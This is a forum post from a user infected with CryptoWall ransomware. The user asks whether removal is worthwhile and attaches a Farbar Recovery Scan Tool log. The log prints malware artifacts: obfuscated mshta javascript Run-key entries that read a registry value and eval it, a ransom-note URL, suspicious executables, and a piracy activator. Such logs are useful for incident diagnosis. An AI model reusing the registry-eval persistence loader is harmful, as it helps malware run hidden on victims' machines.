cryptowall

Posted: 08 Sep 2015 18:30
by tomas_jedno
Hi, unfortunately, even though I'm fairly careful, I caught this beast ... question ... is it worth trying to remove it? Or rather, is this news report true (http://www.novinky.cz/internet-a-pc/371 ... darmo.html), or should I just reformat and bang my head against the wall?

In any case, I'm attaching the log ... :)

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-09-2015
Ran by tomas (administrator) on KRAKONOSOVO (08-09-2015 19:21:47)
Running from C:\Users\tomas\Desktop
Loaded Profiles: tomas (Available Profiles: tomas)
Platform: Windows 8.1 Pro (X64) Language: Angličtina (Spojené státy)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Dassault Systemes) C:\Program Files\Dassault Systemes\B20\win_b64\code\bin\CATSysDemon.exe
(Intel Corporation) C:\Windows\System32\DptfParticipantProcessorService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyConfigTDPService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyCriticalService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmService.exe
(@ByELDI) C:\Program Files\KMSpico\Service_KMS.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmServiceHelper.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.163\SSScheduler.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(VIBRAND) C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp1EC1.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(forum.viry.cz) C:\Users\tomas\Desktop\FRSTLauncher (1).exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\WINDOWS\system32\DptfPolicyLpmServiceHelper.exe [114048 2013-10-18] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13662936 2013-10-24] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1368792 2013-11-13] (Realtek Semiconductor)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [782008 2015-08-26] (Avira Operations GmbH & Co. KG)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [590441228] => C:\ProgramData\mscivosu.exe [71680 2015-06-15] (dswteyurtetuitr)
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [icq] => C:\Users\tomas\AppData\Roaming\ICQM\icq.exe [35224072 2014-12-22] (ICQ)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2899136 2015-08-19] (Valve Corporation)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8358680 2015-06-01] (Piriform Ltd)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [**2b3f035b<*>] => mshta javascript:zg1hbnDOb4="L2O";A3I=new%20ActiveXObject("WScript.Shell");Qt4kkEUtE="BlCeVlLM";VoK8Z=A3I.RegRead("HKCU\\software\\cbc7e7017e\\d0830d66");ZkFmW9YZY="C7tm";eval(VoK8Z);t2s9Omdgih="lolaL (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [**0001d08f<*>] => mshta javascript:Dx98MFWqhu="aNim";KD89=new%20ActiveXObject("WScript.Shell");Ols2XZzHR="Cor";qnfN81=KD89.RegRead("HKCU\\software\\cbc7e7017e\\d0830d66");tFuOj0s7="yZBlnuKVv";eval(qnfN81);TW4W0HiwIS="Z (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [AZNworks] => C:\Users\tomas\AppData\Local\AZNworks\tmp1EC1.exe [137616 2015-09-08] (VIBRAND)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [YWPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\tomas\AppData\Local\AZNworks\AstHelper32.dll
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2015-09-06] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2015-01-25]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.163\SSScheduler.exe (McAfee, Inc.)
Startup: C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML [2015-09-08] ()
Startup: C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG [2015-09-08] ()
Startup: C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT [2015-09-08] ()
InternetURL: C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL -> hxxp://6i3cb6owitcouepv.speralreaopio.com/62bQfN

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{EB1A1010-ABD0-434D-A917-19F0225ED54C}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2015-07-14] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2015-07-14] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2015-07-14] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2015-07-14] (Microsoft Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2014-10-15] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\tomas\AppData\Roaming\Mozilla\Firefox\Profiles\WUHW9Sv9.default
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-03-31] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll [2015-08-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll [2015-08-29] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-03-31] (Microsoft Corporation)
FF Extension: Avira Browser Safety - C:\Users\tomas\AppData\Roaming\Mozilla\Firefox\Profiles\WUHW9Sv9.default\Extensions\abs@avira.com [2014-12-22]

Chrome:
=======
CHR HomePage: Default -> hxxp://isearch.omiga-plus.com/?type=hp&ts=1419069686&from=obw&uid=TOSHIBAXMQ01ABD100_24DTP3DZTXX24DTP3DZT
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
CHR Profile: C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-12-22]
CHR Extension: (Google Docs) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-12-22]
CHR Extension: (Google Drive) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-12-22]
CHR Extension: (YouTube) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-12-22]
CHR Extension: (Ingress G+ Ident) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\cemdjcbehkacgpiielmiakooedjkkphk [2014-12-22]
CHR Extension: (Google Search) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-12-22]
CHR Extension: (Tampermonkey) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2014-12-22]
CHR Extension: (Google Sheets) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-12-22]
CHR Extension: (Avira Browser Safety) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2014-12-22]
CHR Extension: (Google Docs Offline) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-05]
CHR Extension: (AdBlock) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-03-03]
CHR Extension: (Chrome Web Store Payments) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-12-22]
CHR Extension: (Battlefield Play4Free) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\oiokahphinmbmakkehgelkmpolmnbkdh [2015-06-10]
CHR Extension: (Gmail) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-12-22]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [887128 2015-07-27] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [461672 2015-08-26] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [461672 2015-08-26] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1213072 2015-08-26] (Avira Operations GmbH & Co. KG)
R2 BBDemon; C:\Program Files\Dassault Systemes\B20\win_b64\code\bin\CATSysDemon.exe [46592 2009-09-26] (Dassault Systemes) [File not signed]
R2 DptfParticipantProcessorService; C:\Windows\system32\DptfParticipantProcessorService.exe [117704 2013-10-18] (Intel Corporation)
R2 DptfPolicyConfigTDPService; C:\Windows\system32\DptfPolicyConfigTDPService.exe [116680 2013-10-18] (Intel Corporation)
R2 DptfPolicyCriticalService; C:\Windows\system32\DptfPolicyCriticalService.exe [148160 2013-10-18] (Intel Corporation)
R2 DptfPolicyLpmService; C:\Windows\system32\DptfPolicyLpmService.exe [126952 2013-10-18] (Intel Corporation)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.163\McCHSvc.exe [289256 2015-07-31] (McAfee, Inc.)
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [966336 2014-12-04] (@ByELDI) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3880448 2013-11-13] (Qualcomm Atheros Communications, Inc.)
R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [70928 2013-12-12] (ASUS Corporation)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [137288 2015-07-27] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [148632 2015-07-27] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [28600 2014-11-24] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [43576 2015-03-12] (Avira Operations GmbH & Co. KG)
R3 BthLEEnum; C:\Windows\system32\DRIVERS\BthLEEnum.sys [226304 2014-03-18] (Microsoft Corporation)
R3 DptfDevDram; C:\Windows\system32\DRIVERS\DptfDevDram.sys [145640 2013-10-18] (Intel Corporation)
R3 DptfDevPch; C:\Windows\system32\DRIVERS\DptfDevPch.sys [116752 2013-10-18] (Intel Corporation)
R3 DptfDevProc; C:\Windows\system32\DRIVERS\DptfDevProc.sys [289744 2013-10-18] (Intel Corporation)
R3 DptfManager; C:\Windows\system32\DRIVERS\DptfManager.sys [494296 2013-10-18] (Intel Corporation)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-06] ( )
S3 LUMDriver; C:\WINDOWS\system32\drivers\LUMDriver.sys [24848 2008-01-02] (IBM)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-10-23] (Intel Corporation)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [827096 2015-03-12] (Realsil Semiconductor Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
S3 fdrawcmd; \??\C:\WINDOWS\system32\drivers\fdrawcmd.sys [X]
S3 xhunter1; \??\C:\WINDOWS\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-09-08 19:21 - 2015-09-08 19:22 - 00017939 _____ C:\Users\tomas\Desktop\FRST.txt
2015-09-08 19:19 - 2015-09-08 19:19 - 00112640 _____ (forum.viry.cz) C:\Users\tomas\Desktop\FRSTLauncher (1).exe
2015-09-08 19:18 - 2015-09-08 19:18 - 00112640 _____ (forum.viry.cz) C:\Users\tomas\Downloads\Nepotvrzeno 29148.crdownload
2015-09-08 19:17 - 2015-09-08 19:21 - 00000000 ____D C:\FRST
2015-09-08 19:15 - 2015-09-08 19:15 - 02190336 _____ (Farbar) C:\Users\tomas\Desktop\FRST64.exe
2015-09-08 19:08 - 2015-09-08 19:08 - 00000000 ____D C:\Program Files (x86)\ESET
2015-09-08 19:06 - 2015-09-08 19:06 - 02870984 _____ (ESET) C:\Users\tomas\Downloads\esetsmartinstaller_enu.exe
2015-09-08 19:04 - 2015-09-08 19:04 - 00008628 _____ C:\Users\tomas\HELP_DECRYPT.HTML
2015-09-08 19:04 - 2015-09-08 19:04 - 00008628 _____ C:\Users\tomas\Downloads\HELP_DECRYPT.HTML
2015-09-08 19:04 - 2015-09-08 19:04 - 00008628 _____ C:\Users\tomas\Desktop\HELP_DECRYPT.HTML
2015-09-08 19:04 - 2015-09-08 19:04 - 00004254 _____ C:\Users\tomas\HELP_DECRYPT.TXT
2015-09-08 19:04 - 2015-09-08 19:04 - 00004254 _____ C:\Users\tomas\Downloads\HELP_DECRYPT.TXT
2015-09-08 19:04 - 2015-09-08 19:04 - 00004254 _____ C:\Users\tomas\Desktop\HELP_DECRYPT.TXT
2015-09-08 19:04 - 2015-09-08 19:04 - 00000292 _____ C:\Users\tomas\HELP_DECRYPT.URL
2015-09-08 19:04 - 2015-09-08 19:04 - 00000292 _____ C:\Users\tomas\Downloads\HELP_DECRYPT.URL
2015-09-08 19:04 - 2015-09-08 19:04 - 00000292 _____ C:\Users\tomas\Desktop\HELP_DECRYPT.URL
2015-09-08 19:01 - 2015-09-08 19:01 - 00008628 _____ C:\Users\tomas\Documents\HELP_DECRYPT.HTML
2015-09-08 19:01 - 2015-09-08 19:01 - 00004254 _____ C:\Users\tomas\Documents\HELP_DECRYPT.TXT
2015-09-08 19:01 - 2015-09-08 19:01 - 00000292 _____ C:\Users\tomas\Documents\HELP_DECRYPT.URL
2015-09-08 18:57 - 2015-09-08 18:57 - 00008628 _____ C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.HTML
2015-09-08 18:57 - 2015-09-08 18:57 - 00008628 _____ C:\Users\tomas\AppData\HELP_DECRYPT.HTML
2015-09-08 18:57 - 2015-09-08 18:57 - 00004254 _____ C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.TXT
2015-09-08 18:57 - 2015-09-08 18:57 - 00004254 _____ C:\Users\tomas\AppData\HELP_DECRYPT.TXT
2015-09-08 18:57 - 2015-09-08 18:57 - 00000292 _____ C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.URL
2015-09-08 18:57 - 2015-09-08 18:57 - 00000292 _____ C:\Users\tomas\AppData\HELP_DECRYPT.URL
2015-09-08 18:53 - 2015-09-08 18:53 - 00008628 _____ C:\Users\tomas\AppData\Local\HELP_DECRYPT.HTML
2015-09-08 18:53 - 2015-09-08 18:53 - 00004254 _____ C:\Users\tomas\AppData\Local\HELP_DECRYPT.TXT
2015-09-08 18:53 - 2015-09-08 18:53 - 00000292 _____ C:\Users\tomas\AppData\Local\HELP_DECRYPT.URL
2015-09-08 18:41 - 2015-09-08 18:42 - 00000000 ____D C:\Users\tomas\AppData\Local\AZNworks
2015-09-07 21:01 - 2015-09-07 21:06 - 489167296 _____ C:\Users\tomas\Downloads\The.Fappening.zip
2015-09-06 21:28 - 2015-09-06 21:28 - 00048097 _____ C:\Users\tomas\Downloads\20547-courtney-stodden-vypadly-dudy-na-plazi-a-neni-to-pekne.htm
2015-09-06 21:17 - 2015-09-06 21:17 - 00048136 _____ C:\Users\tomas\Downloads\20856-herecka-amanda-seyfried-nam-zase-ukazuje-prsa-a-je-to-fajn.htm
2015-09-06 16:43 - 2015-09-06 16:49 - 00000000 ____D C:\Program Files (x86)\EMBIRD32
2015-09-06 16:41 - 2015-09-06 16:41 - 00003088 _____ C:\WINDOWS\System32\Tasks\{78AC1ACC-0F14-48C3-8F00-757EDF035A96}
2015-09-06 16:38 - 2015-09-06 16:41 - 122506240 _____ C:\Users\tomas\Downloads\embrd2k10b88daio.exe
2015-09-06 16:34 - 2015-09-06 16:34 - 21437440 _____ C:\Users\tomas\Downloads\embrd2k10b88d (1).exe
2015-09-06 16:31 - 2015-09-08 18:41 - 00000000 ____D C:\Users\tomas\AppData\Roaming\WinKun
2015-09-06 16:28 - 2015-09-06 16:55 - 00000232 _____ C:\WINDOWS\setupact.log
2015-09-06 16:28 - 2015-09-06 16:28 - 00000000 _____ C:\WINDOWS\setuperr.log
2015-09-06 16:12 - 2015-09-08 18:53 - 00000000 ____D C:\Users\tomas\AppData\Roaming\EMBIRD32
2015-09-06 16:12 - 2015-09-06 16:12 - 00000000 ____D C:\WINDOWS\system32\appmgmt
2015-09-06 16:11 - 2015-09-06 16:11 - 17931264 _____ C:\Users\tomas\Downloads\embrd2k10b87.exe
2015-09-06 16:08 - 1994-04-19 12:00 - 00000120 _____ C:\WINDOWS\WINRESAZ.INI
2015-09-06 16:08 - 1994-04-19 12:00 - 00000044 _____ C:\WINDOWS\WINKOLES.TXT
2015-09-06 16:05 - 2015-09-06 16:06 - 21437440 _____ C:\Users\tomas\Downloads\embrd2k10b88d.exe
2015-09-06 15:57 - 2015-09-08 18:57 - 00017871 _____ C:\WINDOWS\WindowsUpdate.log
2015-09-06 15:36 - 2015-09-06 15:36 - 00225388 _____ C:\Users\tomas\Downloads\[free-torrents.org]353113_Portable_Launcher.vbs
2015-09-06 15:31 - 2015-09-06 15:31 - 00000000 ____D C:\Users\tomas\AppData\Local\GHISLER
2015-09-06 15:31 - 2013-04-28 16:15 - 00001006 _____ C:\password.klc
2015-09-06 15:30 - 2015-09-06 15:30 - 00000216 _____ C:\Users\tomas\password.klc
2015-09-06 15:29 - 2015-09-06 15:29 - 00000654 _____ C:\Users\tomas\Desktop\Total Commander 64 bit.lnk
2015-09-06 15:29 - 2015-09-06 15:29 - 00000000 ____D C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Total Commander
2015-09-06 15:29 - 2015-09-06 15:29 - 00000000 ____D C:\Users\tomas\AppData\Roaming\GHISLER
2015-09-06 15:29 - 2015-09-06 15:29 - 00000000 ____D C:\totalcmd
2015-09-06 15:28 - 2015-09-06 15:28 - 04467064 _____ (Ghisler Software GmbH) C:\Users\tomas\Downloads\tcmd852x64.exe
2015-09-06 15:26 - 2004-06-13 14:00 - 00000165 _____ C:\WINDOWS\WINRSEAZ.INI
2015-09-06 15:26 - 2004-06-13 14:00 - 00000137 _____ C:\WINDOWS\WINKLOES.TXT
2015-09-06 15:22 - 2015-09-06 15:23 - 65225616 _____ C:\Users\tomas\Downloads\embrd2k12b95_x64_setup.exe
2015-09-06 15:20 - 2015-09-06 15:20 - 02234524 _____ C:\Users\tomas\Downloads\Embird+2013+crack.ace
2015-09-06 15:19 - 2015-09-06 15:21 - 91942120 _____ C:\Users\tomas\Downloads\embrd2k15b1014_x64_setup.exe
2015-09-06 15:16 - 2015-09-06 15:16 - 00696656 _____ C:\Users\tomas\Downloads\Embird%2B2003%2BBuild%2B5%2BCrack%2BDownloader__3687_i1629569851_il3681408.rar
2015-09-06 15:13 - 2015-09-06 15:13 - 02234524 _____ C:\Users\tomas\Downloads\65868315+studio.zip.ace
2015-09-06 15:11 - 2015-09-06 15:12 - 00000000 ____D C:\Users\tomas\Downloads\Embird
2015-09-06 15:11 - 2015-09-06 15:11 - 00033708 _____ C:\Users\tomas\Downloads\Embird (1).torrent
2015-09-06 15:10 - 2015-09-06 15:10 - 00033708 _____ C:\Users\tomas\Downloads\Embird.torrent
2015-09-05 10:29 - 2015-09-05 10:29 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2015-09-05 10:29 - 2015-09-05 10:29 - 00000000 ____D C:\Program Files\McAfee Security Scan
2015-09-02 19:48 - 2015-09-02 19:48 - 00034723 _____ C:\Users\tomas\Downloads\noblesni.htm
2015-08-26 22:01 - 2015-09-08 18:57 - 00000000 ____D C:\Users\tomas\AppData\Roaming\Skype
2015-08-26 22:01 - 2015-09-08 18:53 - 00000000 ____D C:\Users\tomas\AppData\Local\Skype
2015-08-26 22:01 - 2015-09-06 16:12 - 00000000 ____D C:\ProgramData\Skype
2015-08-26 22:00 - 2015-01-06 05:01 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndproxy.sys
2015-08-26 22:00 - 2015-01-06 04:59 - 00080896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wanarp.sys
2015-08-26 22:00 - 2015-01-06 03:12 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascfg.dll
2015-08-26 22:00 - 2015-01-06 03:02 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rascfg.dll
2015-08-26 21:58 - 2015-07-22 16:19 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcResources.dll
2015-08-26 21:58 - 2015-07-22 15:52 - 01633792 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2015-08-26 21:58 - 2015-07-17 16:15 - 00951296 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2015-08-26 21:58 - 2015-07-17 16:10 - 00749568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2015-08-26 21:58 - 2015-07-14 05:27 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzsync.exe
2015-08-26 21:58 - 2015-07-13 21:10 - 00411455 _____ C:\WINDOWS\system32\ApnDatabase.xml
